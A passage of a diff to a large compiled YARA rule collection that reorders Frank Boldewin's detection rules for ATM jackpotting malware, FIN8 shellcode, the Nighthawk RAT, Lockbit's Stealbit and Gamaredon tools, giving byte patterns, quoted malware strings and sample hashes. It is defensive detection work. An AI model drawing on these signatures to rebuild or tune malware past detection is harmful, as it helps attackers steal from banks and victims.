-		source_url = "https://github.com/fboldewin/YARA-rules//blob/54e9e6899b258b72074b2b4db6909257683240c2/UNC2891_Steelcorgi.yar#L1-L17"
+		source_url = "https://github.com/fboldewin/YARA-rules//blob/54e9e6899b258b72074b2b4db6909257683240c2/APT.Gamaredon.GetImportByHash.yar#L1-L16"
 		license_url = "N/A"
-		logic_hash = "4f956b9eaec66bc606ffd0afa2fe9303194e9a8c12d4c3de6ab2334c9856dd99"
+		logic_hash = "b3baebfb745ebc7b9e6df746bfa9622f925b8e8130932e44a148881e7d1fc162"
 		score = 75
 		quality = 90
 		tags = "FILE"
-		hash1 = "0760cd30d18517e87bf9fd8555513423db1cd80730b47f57167219ddbf91f170"
-		hash2 = "3560ed07aac67f73ef910d0b928db3c0bb5f106b5daee054666638b6575a89c5"
-		hash3 = "5b4bb50055b31dbd897172583c7046dd27cd03e1e3d84f7a23837e8df7943547"
+		hash1 = "2d03a301bae0e95a355acd464afc77fde88dd00232aad6c8580b365f97f67a79"
+		hash2 = "43d6e56515cca476f7279c3f276bf848da4bc13fd15fad9663b9e044970253e8"
+		hash3 = "5c09f6ebb7243994ddc466058d5dc9920a5fced5e843200b1f057bda087b8ba6"
 
 	strings:
-		$pattern1 = {70 61 64 00 6C 63 6B 00}
-		$pattern2 = {FF 72 FF 6F FF 63 FF 2F FF 73 FF 65 FF 6C FF 66 FF 2F FF 65 FF 78 FF 65}
+		$ParseImgExportDir = { 8B 50 3C 03 D0 8B 52 78 03 D0 8B 4A 1C 03 C8 }
+		$djb2Hashing = { 8B 75 08 BA 05 15 00 00 8B C2 C1 E2 05 03 D0 33 DB 8A 1E 03 D3 46 33 DB 8A 1E 85 DB 75 }
 
 	condition:
-		uint32( 0 ) == 0x464c457f and all of them
+		uint16( 0 ) == 0x5a4d and all of them
 }
-
-rule R3C0NST_Nighthawk_RAT : FILE
+rule R3C0NST_Stealbit : FILE
 {
 	meta:
-		description = "Detects Nighthawk RAT"
+		description = "Detects Stealbit used by Lockbit 2.0 Ransomware Gang"
 		author = "Frank Boldewin (@r3c0nst)"
-		id = "7a58b8bf-fb14-5758-bc2a-ad2c6fff1216"
-		date = "2022-11-30"
-		modified = "2022-11-30"
-		reference = "https://www.proofpoint.com/us/blog/threat-insight/nighthawk-and-coming-pentest-tool-likely-gain-threat-actor-notice"
-		source_url = "https://github.com/fboldewin/YARA-rules//blob/54e9e6899b258b72074b2b4db6909257683240c2/nighthawk.yar#L3-L28"
+		id = "07b466cb-92b3-51f2-a702-2930bb7038c6"
+		date = "2021-08-12"
+		modified = "2021-08-12"
+		reference = "https://raw.githubusercontent.com/fboldewin/YARA-rules/master/Lockbit2.Stealbit.yar"
+		source_url = "https://github.com/fboldewin/YARA-rules//blob/54e9e6899b258b72074b2b4db6909257683240c2/Lockbit2.Stealbit.yar#L1-L15"
 		license_url = "N/A"
-		logic_hash = "5124f7c0186f40cf0a7706e17afe6ba791ca82ac4f4ee940f6fbae5223771a95"
+		logic_hash = "e5f770cc5887f09af0c5550073d51b9e5ffa9dcfa4db6b77bb28643f0f6224fb"
 		score = 75
 		quality = 90
 		tags = "FILE"
-		hash1 = "0551ca07f05c2a8278229c1dc651a2b1273a39914857231b075733753cb2b988"
-		hash2 = "9a57919cc5c194e28acd62719487c563a8f0ef1205b65adbe535386e34e418b8"
-		hash3 = "38881b87826f184cc91559555a3456ecf00128e01986a9df36a72d60fb179ccf"
-		hash4 = "f3bba2bfd4ed48b5426e36eba3b7613973226983a784d24d7a20fcf9df0de74e"
-		hash5 = "b775a8f7629966592cc7727e2081924a7d7cf83edd7447aa60627a2b67d87c94"
+		hash1 = "3407f26b3d69f1dfce76782fee1256274cf92f744c65aa1ff2d3eaaaf61b0b1d"
+		hash2 = "bd14872dd9fdead89fc074fdc5832caea4ceac02983ec41f814278130b3f943e"
 
 	strings:
-		$pattern1 = { 48 8d 0d ?? ?? ?? ?? 51 5a 48 81 c1 ?? ?? ?? ?? 48 81 c2 ?? ?? ?? ?? ff e2 }
-		$pattern2 = { 66 03 D2 66 33 D1 66 C1 E2 02 66 33 D1 66 23 D0 0F B7 C1 }
-		$pattern3 = { FF 7F 48 3B F0 48 0F 47 F0 48 8D }
-		$pattern4 = { 65 48 8B 04 25 30 00 00 00 8B 40 68 49 89 CA 0F 05 C3 }
-		$pattern5 = { 48 B8 AA AA AA AA AA AA AA 02 48 ?? ?? ?? ?? 0F 84 }
-		$pattern6 = { 65 48 8B 04 25 30 00 00 00 48 8B 80 }
+		$C2Decryption = {33 C9 8B C1 83 E0 0F 8A 80 ?? ?? ?? ?? 30 81 ?? ?? ?? ?? 41 83 F9 7C 72 E9 E8}
 
 	condition:
-		uint16( 0 ) == 0x5A4D and filesize < 2MB and ( 3 of ( $pattern* ) or ( pe.section_index ( ".profile" ) and pe.section_index ( ".detourc" ) and pe.section_index ( ".detourd" ) ) )
+		uint16( 0 ) == 0x5A4D and filesize < 100KB and $C2Decryption
 }
 rule R3C0NST_Prolock_Malware : FILE
 {
@@ -58205,146 +58805,6 @@ rule R3C0NST_Prolock_Malware : FILE
 	condition:
 		(( uint16( 0 ) == 0x5A4D ) or ( uint16( 0 ) == 0x4D42 ) ) and filesize < 100KB and all of ( $DecryptionRoutine* ) or ( 1 of ( $DecryptedString* ) and $CryptoCode )
 }
-rule R3C0NST_ATM_Malware_Dispcashbr : FILE
-{
-	meta:
-		description = "Detects ATM Malware DispCashBR"
-		author = "Frank Boldewin (@r3c0nst)"
-		id = "17d22120-0ca2-5b27-9816-21ab4a6fb20c"
-		date = "2020-02-27"
-		modified = "2020-08-17"
-		reference = "https://twitter.com/r3c0nst/status/1232944566208286720"
-		source_url = "https://github.com/fboldewin/YARA-rules//blob/54e9e6899b258b72074b2b4db6909257683240c2/ATM.Malware.DispCashBR.yar#L1-L21"
-		license_url = "N/A"
-		logic_hash = "3fb5d62cb779ddc13e9b938290dfa9d2a3353d7969e639a662c1bcaca945de4d"
-		score = 75
-		quality = 90
-		tags = "FILE"
-		hash1 = "7cea6510434f2c8f28c9dbada7973449bb1f844cfe589cdc103c9946c2673036"
-
-	strings:
-		$String1 = "(*) Dispensando: %lu" ascii nocase
-		$String2 = "COMANDO EXECUTADO COM SUCESSO" ascii nocase
-		$String3 = "[+] FOI SACADO:  %lu R$ [+]" ascii nocase
-		$DbgStr1 = "_Get_Information_cdm_cuinfo" ascii nocase
-		$DbgStr2 = "_GET_INFORMATION_SHUTTER" ascii nocase
-		$Code1 = {C7 44 24 08 00 00 00 00 C7 44 24 04 2F 01 00 00 89 04 24 E8}
-		$Code2 = {C7 44 24 08 00 00 00 00 C7 44 24 04 17 05 00 00 89 04 24 E8}
-		$Code3 = {89 4C 24 08 C7 44 24 04 2E 01 00 00 89 04 24 E8}
-
-	condition:
-		uint16( 0 ) == 0x5A4D and filesize < 100KB and 2 of ( $String* ) and 1 of ( $DbgStr* ) and all of ( $Code* )
-}
-rule R3C0NST_ATM_Malware_XFSADM : FILE
-{
-	meta:
-		description = "Detects ATM Malware XFSADM"
-		author = "Frank Boldewin (@r3c0nst)"
-		id = "57124fef-73a1-5978-b165-b1b7d7c1196e"
-		date = "2019-06-21"
-		modified = "2019-07-11"
-		reference = "https://twitter.com/r3c0nst/status/1149043362244308992"
-		source_url = "https://github.com/fboldewin/YARA-rules//blob/54e9e6899b258b72074b2b4db6909257683240c2/ATM.Malware.XFSADM.yar#L1-L24"
-		license_url = "N/A"
-		logic_hash = "2dd0b9e0a2dd18725c9342a234520c96c6b30cf3ce7196562b2380a39f5f8673"
-		score = 75
-		quality = 84
-		tags = "FILE"
-		hash1 = "2740bd2b7aa0eaa8de2135dd710eb669d4c4c91d29eefbf54f1b81165ad2da4d"
-
-	strings:
-		$Code1 = {68 88 13 00 00 FF 35 ?? ?? ?? ?? 68 CF 00 00 00 50 FF 15}
-		$Code2 = {68 98 01 00 00 50 FF 15}
-		$Mutex = "myXFSADM" nocase wide
-		$MSXFSDIR = "C:\\Windows\\System32\\msxfs.dll" nocase ascii
-		$XFSCommand1 = "WfsExecute" nocase ascii
-		$XFSCommand2 = "WfsGetInfo" nocase ascii
-		$PDB = "C:\\Work64\\ADM\\XFS\\Release\\XFS.pdb" nocase ascii
-		$WindowName = "XFS ADM" nocase wide
-		$FindWindow = "ADM rec" nocase wide
-		$LogFile = "xfs.log" nocase ascii
-		$TmpFile = "~pipe.tmp" nocase ascii
-
-	condition:
-		uint16( 0 ) == 0x5A4D and filesize < 500KB and 4 of them
-}
-rule R3C0NST_ATM_Malware_Ripper : ATMRIPPER MALWARE FILE
-{
-	meta:
-		description = "Rule detects Thailand ATM Jackpot malware RIPPER (unpacked)"
-		author = "Frank Boldewin"
-		id = "38dfda5b-45cc-55d4-b619-91fa31c09a09"
-		date = "2016-08-01"
-		modified = "2019-02-27"
-		reference = "https://github.com/fboldewin/YARA-rules/"
-		source_url = "https://github.com/fboldewin/YARA-rules//blob/54e9e6899b258b72074b2b4db6909257683240c2/ATM.Malware.Ripper.yar#L1-L22"
-		license_url = "N/A"
-		logic_hash = "bb7b474330defe6d071b9595687d4510961055fa243a26306698c1e029a935f1"
-		score = 75
-		quality = 90
-		tags = "ATMRIPPER, MALWARE, FILE"
-		malware_family = "ATM-malware RIPPER"
-
-	strings:
-		$Card_Hash1 = "be59a724feae790b3f315edf71a8450888c021f113e3c2b471e174130c201852" nocase ascii
-		$Card_Hash2 = "f26a57da928d6f3e3480dfc7d03761161191bdb170e10ca15c7ac5de6912945c" nocase ascii
-		$Card_Hash3 = "692cdaf6e42ab3a4f307e5d047249f7b30ceddd6bc88f22ca032412419bd62b7" nocase ascii
-		$Card_Hash4 = "0679c7c0c9b0d6919c12cbc087e942d7bf48d3a78cd3ec80321fbfd1b33a1904" nocase ascii
-		$Code_Bytes1 = { 68 CB 00 00 00 50 FF 15 ?? ?? ?? ?? EB 19 }
-		$Code_Bytes2 = { E8 ?? ?? ?? ?? 83 C4 18 6A 02 53 53 FF 15 ?? ?? ?? ?? 68 74 12 43 00 8D 55 A4 }
-		$Service = "DBACKUP SERVICE" nocase wide
-
-	condition:
-		uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 and 2 of ( $Card_Hash* ) and all of ( $Code_Bytes* ) and filesize < 400KB and ( $Service in ( 0x2f000 .. 0x30000 ) )
-}
-rule R3C0NST_Aplib_Decompression : FILE
-{
-	meta:
-		description = "Detects aPLib decompression code often used in malware"
-		author = "@r3c0nst"
-		id = "f45c73f5-d316-5fea-a8c4-fd930733415f"
-		date = "2021-03-24"
-		modified = "2021-03-25"
-		reference = "https://ibsensoftware.com/files/aPLib-1.1.1.zip"
-		source_url = "https://github.com/fboldewin/YARA-rules//blob/54e9e6899b258b72074b2b4db6909257683240c2/aPLib_decompression.yar#L1-L16"
-		license_url = "N/A"
-		logic_hash = "1150701724fdb487ebe8fb959afd12fff37a8e9137cb94e78e976a2566ec5fa4"
-		score = 75
-		quality = 90
-		tags = "FILE"
-
-	strings:
-		$pattern1 = { FC B2 80 31 DB A4 B3 02 }
-		$pattern2 = { AC D1 E8 74 ?? 11 C9 EB }
-		$pattern3 = { 73 0A 80 FC 05 73 ?? 83 F8 7F 77 }
-
-	condition:
-		filesize < 10MB and all of them
-}
-rule R3C0NST_Shellcode_Apihashing_FIN8
-{
-	meta:
-		description = "Detects FIN8 Shellcode APIHashing"
-		author = "Frank Boldewin (@r3c0nst)"
-		id = "a5b4a925-c4cc-5d3a-a2f1-3372f77ceea2"
-		date = "2021-03-16"
-		modified = "2021-03-25"
-		reference = "https://www.bitdefender.com/files/News/CaseStudies/study/394/Bitdefender-PR-Whitepaper-BADHATCH-creat5237-en-EN.pdf"
-		source_url = "https://github.com/fboldewin/YARA-rules//blob/54e9e6899b258b72074b2b4db6909257683240c2/Shellcode.APIHashing.FIN8.yar#L1-L74"
-		license_url = "N/A"
-		logic_hash = "958d6a3c0c78ad22fb56896d6a97b9fe79c56813dc36a37385f3ce5621008624"
-		score = 75
-		quality = 90
-		tags = ""
-
-	strings:
-		$APIHashing32bit1 = {68 F2 55 03 88 68 65 19 6D 1E}
-		$APIHashing32bit2 = {68 9B 59 27 21 C1 E9 17 33 4C 24 10 68 37 5C 32 F4}
-		$APIHashing64bit = {49 BF 65 19 6D 1E F2 55 03 88 49 BE 37 5C 32 F4 9B 59 27 21}
-
-	condition:
-		all of ( $APIHashing32bit* ) or $APIHashing64bit
-}
 rule R3C0NST_UNC2891_Caketap
 {
 	meta:
@@ -58370,129 +58830,87 @@ rule R3C0NST_UNC2891_Caketap
 	condition:
 		uint32( 0 ) == 0x464c457f and ( all of ( $code* ) or ( all of ( $str* ) and #str2 == 2 ) )
 }
-rule R3C0NST_ATM_Malware_Xfscashncr : FILE
+rule R3C0NST_Shellcode_Apihashing_FIN8
 {
 	meta:
-		description = "Detects ATM Malware XFSCashNCR"
+		description = "Detects FIN8 Shellcode APIHashing"
 		author = "Frank Boldewin (@r3c0nst)"
-		id = "8886cd00-4f4a-5f25-99e0-0806f5e1b4b4"
-		date = "2019-08-28"
-		modified = "2019-08-28"
-		reference = "https://twitter.com/r3c0nst/status/1166773324548063232"
-		source_url = "https://github.com/fboldewin/YARA-rules//blob/54e9e6899b258b72074b2b4db6909257683240c2/ATM.Malware.XFSCashNCR.yar#L1-L21"
+		id = "a5b4a925-c4cc-5d3a-a2f1-3372f77ceea2"
+		date = "2021-03-16"
+		modified = "2021-03-25"
+		reference = "https://www.bitdefender.com/files/News/CaseStudies/study/394/Bitdefender-PR-Whitepaper-BADHATCH-creat5237-en-EN.pdf"
+		source_url = "https://github.com/fboldewin/YARA-rules//blob/54e9e6899b258b72074b2b4db6909257683240c2/Shellcode.APIHashing.FIN8.yar#L1-L74"
 		license_url = "N/A"
-		logic_hash = "87f197058d4b515cb4829b5e403a96b88eb95cda81e53a9e1484df8c743d8c4a"
+		logic_hash = "958d6a3c0c78ad22fb56896d6a97b9fe79c56813dc36a37385f3ce5621008624"
 		score = 75
 		quality = 90
-		tags = "FILE"
-		hash1 = "d6dff67a6b4423b5721908bdcc668951f33b3c214e318051c96e8c158e8931c0"
+		tags = ""
 
 	strings:
-		$Code1 = {50 8b 4d e8 8b 51 10 52 6a 00 68 2d 01 00 00 8b 45 e8 0f b7 48 1c 51 e8}
-		$Code2 = {52 8d 45 d0 50 68 2e 01 00 00 8b 4d e8 0f b7 51 1c 52 e8}
-		$StatusMessage1 = "[+] Ingrese Denominacion ISO" nocase ascii
-		$StatusMessage2 = "[+] Ingrese numero de billetes" nocase ascii
-		$StatusMessage3 = "[!] FAIL.. dispensadores no encontrados" nocase ascii
-		$StatusMessage4 = "[!] Unable continue, IMPOSIBLE abrir dispenser" nocase ascii
-		$PDB = "C:\\Users\\cyttek\\Downloads\\xfs_cashXP\\Debug\\xfs_cash_ncr.pdb" nocase ascii
-		$LogFile = "XfsLog.txt" nocase ascii
+		$APIHashing32bit1 = {68 F2 55 03 88 68 65 19 6D 1E}
+		$APIHashing32bit2 = {68 9B 59 27 21 C1 E9 17 33 4C 24 10 68 37 5C 32 F4}
+		$APIHashing64bit = {49 BF 65 19 6D 1E F2 55 03 88 49 BE 37 5C 32 F4 9B 59 27 21}
 
 	condition:
-		uint16( 0 ) == 0x5A4D and filesize < 1500KB and 4 of them
+		all of ( $APIHashing32bit* ) or $APIHashing64bit
 }
-rule R3C0NST_ATM_Malware_XFS_DIRECT : FILE
+rule R3C0NST_ATM_Malware_XFS_ALICE : FILE
 {
 	meta:
-		description = "Detects ATM Malware XFS_DIRECT"
+		description = "Detects ATM Malware ALICE"
 		author = "Frank Boldewin (@r3c0nst)"
-		id = "d1551c50-d3d2-56fd-a6b7-198d3a26ac72"
-		date = "2019-10-18"
-		modified = "2019-10-19"
-		reference = "https://twitter.com/r3c0nst/status/1185237040583106560"
-		source_url = "https://github.com/fboldewin/YARA-rules//blob/54e9e6899b258b72074b2b4db6909257683240c2/ATM.Malware.XFS_DIRECT.yar#L1-L37"
+		id = "6132730c-4684-517a-b90d-98ed250e2cba"
+		date = "2020-01-09"
+		modified = "2020-08-17"
+		reference = "https://twitter.com/r3c0nst/status/1215265889844637696"
+		source_url = "https://github.com/fboldewin/YARA-rules//blob/54e9e6899b258b72074b2b4db6909257683240c2/ATM.Malware.ALICE.yar#L1-L22"
 		license_url = "N/A"
-		logic_hash = "844a334d0eb8516c0ef3780e48e3dbc8e23d41c80bdff10f01407b775e72709e"
+		logic_hash = "7dca049f024f09c2e778b0693a1015d1fc5a006fc564de914e85231cb5d73da3"
 		score = 75
 		quality = 90
 		tags = "FILE"
-		hash1 = "3e023949fecd5d06b3dff9e86e6fcac6a9ec6c805b93118db43fb4e84fe43ee0"
-		hash2 = "303f2a19b286ca5887df2a334f22b5690dda9f092e677786e2a8879044d8ad11"
-		hash3 = "15d50938e51ee414124314095d3a27aa477f40413f83d6a2b2a2007efc5a623a"
-		hash4 = "0f9cb4dc1ac2777be30145c3271c95a027758203d0de245ec390037f7325d79d"
-		hash5 = "141ae291ddae60fd1b232f543bc9b40f3a083521cd7330c427bb8fc5cdd23966"
-		hash6 = "66eb1a8134576db05382109eec7e297149f25a021aba5171d2f99aa49c381456"
-		hash7 = "ac20b12beefb2036595780aaf7ec29203e2e09b6237d93cd26eaa811cebd6665"
-		hash8 = "901fc474f50eb62edc526593208a7eec4df694e342ffc5b895d1dcec953c6899"
-		hash9 = "56548c26741b25b15c27a0de498c5e04c69b0c9250ba35e3a578bc2f05eedd07"
-		hash10 = "c89f1d562983398ab2d6dd75e4e30cc0e95eab57cdf48c4a17619dca9ecc0748"
+		hash1 = "6b2fac8331e4b3e108aa829b297347f686ade233b24d94d881dc4eff81b9eb30"
 
 	strings:
-		$EncLayer1 = {0F B6 51 FC 30 50 FF 0F B6 11 30 10 0F B6 51 04 30 50 01 0F B6 51 08 30 50 02}
-		$EncLayer2 = {B8 4D 5A 00 00 89 33 66 39 06 75 ?? 8b ?? 3c}
-		$String1 = "NOW ENTER MASTER KEY" ascii nocase
-		$String2 = "Closing app, than delete myself." ascii nocase
-		$String3 = "Number of phisical cash units is:" ascii nocase
-		$String4 = "COULD NOT ENABLE or DISABLE connection" ascii nocase
-		$String5 = "XFS_DIRECT" ascii nocase
-		$String6 = "Take the money you snicky mother fucker :)" ascii nocase
-		$String7 = "ATM IS TEMPORARILY OUT OF SERVICE!" wide nocase
-		$Code1 = {D1 F8 89 44 24 10 DB 44 24 10 DC 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 35 2F 81 0B 00 A3}
-		$Code2 = {8B ?? ?? ?? 68 2E 01 00 00 52 C7 ?? 06 01 00 00 00}
+		$String1 = "Project Alice" ascii nocase
+		$String2 = "Can't dispense requested amount." ascii nocase
+		$String3 = "Selected cassette is unavailable" ascii nocase
+		$String4 = "ATM update manager" wide nocase
+		$String5 = "Input PIN-code for access" wide nocase
+		$String6 = "Supervisor ID" wide nocase
+		$Code1 = {50 68 08 07 00 00 6A 00 FF 75 0C FF 75 08 E8}
+		$Code2 = {50 6A 00 FF 75 10 FF 75 0C FF 75 08 E8}
+		$Code3 = {68 ?? ?? ?? ?? 53 E8 ?? ?? ?? ?? 0B C0 75 29 6A}
 
 	condition:
-		uint16( 0 ) == 0x5A4D and ( filesize < 1500KB and all of ( $EncLayer* ) ) or ( filesize < 300KB and 4 of ( $String* ) and all of ( $Code* ) )
+		uint16( 0 ) == 0x5A4D and filesize < 200KB and 4 of ( $String* ) and all of ( $Code* )
 }
 
-rule R3C0NST_ATM_Malware_ATMITCH : FILE
-{
-	meta:
-		description = "Detects ATM Malware ATMItch"
-		author = "Frank Boldewin (@r3c0nst)"
-		id = "4d7e9615-9db6-5fc7-b95e-b8c7b2c034a8"
-		date = "2019-03-18"
-		modified = "2019-03-18"
-		reference = "https://github.com/fboldewin/YARA-rules/"
-		source_url = "https://github.com/fboldewin/YARA-rules//blob/54e9e6899b258b72074b2b4db6909257683240c2/ATM.Malware.ATMItch.yar#L3-L14"
-		license_url = "N/A"
-		logic_hash = "4278cbcd8c465ba57b65a166e0bd48dcc73eae8660972478d3116bc0d73cf3c4"
-		score = 75
-		quality = 82
-		tags = "FILE"
-
-	strings:
-		$STRING1 = "SCREEN and think what does you DO" nocase ascii wide
-		$STRING2 = "Receive CASH UNIT info first, then LOOK on" nocase ascii wide
-		$STRING3 = "Unknown command mnemonic, check it and repeat again" nocase ascii wide
-		$STRING4 = "Catch some money, bitch!" nocase ascii wide
-
-	condition:
-		( uint16( 0 ) == 0x5A4D and 1 of them ) or ( pe.imphash ( ) == "655ad5439db0832c5a3f86d0a68ddaac" )
-}
-rule R3C0NST_Gamaredon_Getimportbyhash : FILE
+rule R3C0NST_ATM_Malware_Ploutusi : FILE
 {
 	meta:
-		description = "Detects Gamaredon APIHashing"
+		description = "Detects Ploutus I .NET samples based on MetabaseQ report"
 		author = "Frank Boldewin (@r3c0nst)"
-		id = "8f28273e-e8ca-52cb-8dbc-a235598b1975"
-		date = "2021-05-12"
-		modified = "2021-05-12"
-		reference = "https://github.com/fboldewin/YARA-rules/"
-		source_url = "https://github.com/fboldewin/YARA-rules//blob/54e9e6899b258b72074b2b4db6909257683240c2/APT.Gamaredon.GetImportByHash.yar#L1-L16"
+		id = "02104112-6f81-5d19-935d-45cfcd2fa41c"
+		date = "2021-03-03"
+		modified = "2021-03-04"
+		reference = "https://www.metabaseq.com/recursos/ploutus-is-back-targeting-itautec-atms-in-latin-america"
+		source_url = "https://github.com/fboldewin/YARA-rules//blob/54e9e6899b258b72074b2b4db6909257683240c2/ATM.Malware.Ploutus-I.yar#L3-L26"
 		license_url = "N/A"
-		logic_hash = "b3baebfb745ebc7b9e6df746bfa9622f925b8e8130932e44a148881e7d1fc162"
+		logic_hash = "77100d300a40219187f5c4b8270f599a91652b69980fe450b791181b8c30b5a4"
 		score = 75
 		quality = 90
 		tags = "FILE"
-		hash1 = "2d03a301bae0e95a355acd464afc77fde88dd00232aad6c8580b365f97f67a79"
-		hash2 = "43d6e56515cca476f7279c3f276bf848da4bc13fd15fad9663b9e044970253e8"
-		hash3 = "5c09f6ebb7243994ddc466058d5dc9920a5fced5e843200b1f057bda087b8ba6"
+		hash1 = "4f6d4c6f97caf888a98a3097b663055b63e605f15ea8f7cc7347283a0b8424c1"
+		hash2 = "8ca29597152dc79bcf79394e1ae2635b393d844bb0eeef6709d37e6778457b31"
+		hash3 = "dce1f01c08937fb5c98964a0911de403eed2101a9d46c5eb9899755c40c3765a"
+		hash4 = "3a1d992277a862640a0835af9dff4b029cfc6c5451e9716f106efaf07702a98c"
 
 	strings:
-		$ParseImgExportDir = { 8B 50 3C 03 D0 8B 52 78 03 D0 8B 4A 1C 03 C8 }
-		$djb2Hashing = { 8B 75 08 BA 05 15 00 00 8B C2 C1 E2 05 03 D0 33 DB 8A 1E 03 D3 46 33 DB 8A 1E 85 DB 75 }
+		$Code = {28 ?? 02 00 06 2a}
 
 	condition:
-		uint16( 0 ) == 0x5a4d and all of them
+		filesize < 300KB and $Code and pe.pdb_path contains "Diebold.pdb" and pe.imports ( "mscoree.dll" , "_CorExeMain" ) and ( for any i in ( 0 .. pe.number_of_resources -1 ) : ( pe.resources [ i ] . type == pe.RESOURCE_TYPE_VERSION and ( pe.version_info [ "InternalName" ] contains "Diebold.exe" ) ) )
 }
 rule R3C0NST_ATM_Malware_Javadispcash : FILE
 {
@@ -58524,111 +58942,120 @@ rule R3C0NST_ATM_Malware_Javadispcash : FILE
 		uint16( 0 ) == 0x4B50 and filesize < 500KB and all of them
 }
 
-rule R3C0NST_ATM_Malware_Dispenserxfs : FILE
+rule R3C0NST_Nighthawk_RAT : FILE
 {
 	meta:
-		description = "No description has been set in the source file - R3c0nst"
-		author = "Frank Boldewin"
-		id = "52b1aa57-283b-54d7-bd1b-fb5da5f8d269"
-		date = "2019-02-28"
-		modified = "2019-02-28"
-		reference = "https://github.com/fboldewin/YARA-rules/"
-		source_url = "https://github.com/fboldewin/YARA-rules//blob/54e9e6899b258b72074b2b4db6909257683240c2/ATM.Malware.DispenserXFS.yar#L3-L13"
+		description = "Detects Nighthawk RAT"
+		author = "Frank Boldewin (@r3c0nst)"
+		id = "7a58b8bf-fb14-5758-bc2a-ad2c6fff1216"
+		date = "2022-11-30"
+		modified = "2022-11-30"
+		reference = "https://www.proofpoint.com/us/blog/threat-insight/nighthawk-and-coming-pentest-tool-likely-gain-threat-actor-notice"
+		source_url = "https://github.com/fboldewin/YARA-rules//blob/54e9e6899b258b72074b2b4db6909257683240c2/nighthawk.yar#L3-L28"
 		license_url = "N/A"
-		logic_hash = "0e588e2ba03d5eb750183600cce278e791a71f86fbf933ba9d7fda352bd37e2f"
+		logic_hash = "5124f7c0186f40cf0a7706e17afe6ba791ca82ac4f4ee940f6fbae5223771a95"
 		score = 75
-		quality = 59
+		quality = 90
 		tags = "FILE"
+		hash1 = "0551ca07f05c2a8278229c1dc651a2b1273a39914857231b075733753cb2b988"
+		hash2 = "9a57919cc5c194e28acd62719487c563a8f0ef1205b65adbe535386e34e418b8"
+		hash3 = "38881b87826f184cc91559555a3456ecf00128e01986a9df36a72d60fb179ccf"
+		hash4 = "f3bba2bfd4ed48b5426e36eba3b7613973226983a784d24d7a20fcf9df0de74e"
+		hash5 = "b775a8f7629966592cc7727e2081924a7d7cf83edd7447aa60627a2b67d87c94"
 
 	strings:
-		$Code_Bytes = { 68 FF FF 00 00 68 60 EA 00 00 6A 10 }
-		$XFSKILL = "injected mxsfs killer into" nocase ascii wide
-		$PDB = "C:\\_bkittest\\dispenser\\Release_noToken\\dispenserXFS.pdb" nocase ascii wide
+		$pattern1 = { 48 8d 0d ?? ?? ?? ?? 51 5a 48 81 c1 ?? ?? ?? ?? 48 81 c2 ?? ?? ?? ?? ff e2 }
+		$pattern2 = { 66 03 D2 66 33 D1 66 C1 E2 02 66 33 D1 66 23 D0 0F B7 C1 }
+		$pattern3 = { FF 7F 48 3B F0 48 0F 47 F0 48 8D }
+		$pattern4 = { 65 48 8B 04 25 30 00 00 00 8B 40 68 49 89 CA 0F 05 C3 }
+		$pattern5 = { 48 B8 AA AA AA AA AA AA AA 02 48 ?? ?? ?? ?? 0F 84 }
+		$pattern6 = { 65 48 8B 04 25 30 00 00 00 48 8B 80 }
 
 	condition:
-		(hash.sha256 ( 0 , filesize ) == "867991ade335186baa19a227e3a044c8321a6cef96c23c98eef21fe6b87edf6a" ) or ( uint16( 0 ) == 0x5A4D and 1 of them )
+		uint16( 0 ) == 0x5A4D and filesize < 2MB and ( 3 of ( $pattern* ) or ( pe.section_index ( ".profile" ) and pe.section_index ( ".detourc" ) and pe.section_index ( ".detourd" ) ) )
 }
-rule R3C0NST_Stealbit : FILE
+
+rule R3C0NST_ATM_Malware_Atmspitter : FILE
 {
 	meta:
-		description = "Detects Stealbit used by Lockbit 2.0 Ransomware Gang"
+		description = "Detects ATM Malware ATMSpitter"
 		author = "Frank Boldewin (@r3c0nst)"
-		id = "07b466cb-92b3-51f2-a702-2930bb7038c6"
-		date = "2021-08-12"
-		modified = "2021-08-12"
-		reference = "https://raw.githubusercontent.com/fboldewin/YARA-rules/master/Lockbit2.Stealbit.yar"
-		source_url = "https://github.com/fboldewin/YARA-rules//blob/54e9e6899b258b72074b2b4db6909257683240c2/Lockbit2.Stealbit.yar#L1-L15"
+		id = "4497f304-6f04-5f5d-91ba-9124e5262078"
+		date = "2016-07-20"
+		modified = "2019-03-29"
+		reference = "https://topics.amcham.com.tw/2017/02/looking-back-at-the-first-banks-atm-heist/"
+		source_url = "https://github.com/fboldewin/YARA-rules//blob/54e9e6899b258b72074b2b4db6909257683240c2/ATM.Malware.ATMSpitter.yar#L3-L21"
 		license_url = "N/A"
-		logic_hash = "e5f770cc5887f09af0c5550073d51b9e5ffa9dcfa4db6b77bb28643f0f6224fb"
+		hash = "658b0502b53f718bd0611a638dfd5969"
+		logic_hash = "684820ed29c50a41bd262862cb97c70c0cbb8554e7e4be300986519423249c50"
 		score = 75
-		quality = 90
+		quality = 65
 		tags = "FILE"
-		hash1 = "3407f26b3d69f1dfce76782fee1256274cf92f744c65aa1ff2d3eaaaf61b0b1d"
-		hash2 = "bd14872dd9fdead89fc074fdc5832caea4ceac02983ec41f814278130b3f943e"
 
 	strings:
-		$C2Decryption = {33 C9 8B C1 83 E0 0F 8A 80 ?? ?? ?? ?? 30 81 ?? ?? ?? ?? 41 83 F9 7C 72 E9 E8}
+		$Code_Bytes = { B9 E0 07 00 00 66 ?? ?? ?? ?? 0F 85 DD 02 00 00 66 ?? ?? ?? ?? ?? 0F 85 D1 02 00 00 }
+		$Service = "Congratulations! You are very skilled in reverse engineering!" nocase ascii
 
 	condition:
-		uint16( 0 ) == 0x5A4D and filesize < 100KB and $C2Decryption
+		(hash.sha256 ( 0 , filesize ) == "4035d977202b44666885f9781ac8755c799350a03838ff782eb730c0d7069958" ) or ( $Code_Bytes and $Service )
 }
-rule R3C0NST_ATM_Malware_XFS_ALICE : FILE
+rule R3C0NST_ATM_Malware_NVISOSPIT : FILE
 {
 	meta:
-		description = "Detects ATM Malware ALICE"
+		description = "Detects ATM Malware NVISOSPIT"
 		author = "Frank Boldewin (@r3c0nst)"
-		id = "6132730c-4684-517a-b90d-98ed250e2cba"
-		date = "2020-01-09"
-		modified = "2020-08-17"
-		reference = "https://twitter.com/r3c0nst/status/1215265889844637696"
-		source_url = "https://github.com/fboldewin/YARA-rules//blob/54e9e6899b258b72074b2b4db6909257683240c2/ATM.Malware.ALICE.yar#L1-L22"
+		id = "faf9e78e-9d7a-5c9b-a08e-90b895333d5c"
+		date = "2019-05-31"
+		modified = "2019-05-31"
+		reference = "https://twitter.com/r3c0nst/status/1134403094157115392"
